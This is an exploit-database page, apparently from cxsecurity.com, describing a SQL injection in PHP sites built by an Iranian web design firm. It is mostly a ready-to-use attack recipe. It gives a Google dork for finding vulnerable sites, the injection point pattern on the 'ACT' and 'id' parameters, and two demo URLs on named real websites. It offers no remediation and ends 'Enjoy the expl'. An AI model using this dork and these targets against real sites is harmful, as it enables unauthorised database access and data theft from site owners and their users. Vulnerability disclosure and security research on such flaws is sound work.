Developed by Data Corp sql injection

2017.06.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Developed by Data Corp sql injection # Google Dork: intext:طراحی و توسعه توسط پارسیان داده inurl:php?id= # Date: Monday - 2017 05 June # Exploit Author: Unline Security Team # Vendor Homepage: http://parsiandadeh.com/ # Tested on: Ubuntu - firefox -------------------------------------- Poc: 1.Search The Dork in Google 2.find the target ===> site.com/[filename].php?ACT=[sql]' 3.Enjoy the expl:D -------------------------------------- #Demo: http://www.fajrmusicfestival.com/festival.php?ACT=DETAIL_NEWS&id=39%27 http://t-nay.ir/archive/indexf.php?ACT=DETAIL_NEWS&id=5442%27 -------------------------------------- #!Spc Tanx: a.k hacker - Arefkd - b0llym4n - SoltanSilent #!Telegram Channel: @unlinesec Good Luck


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top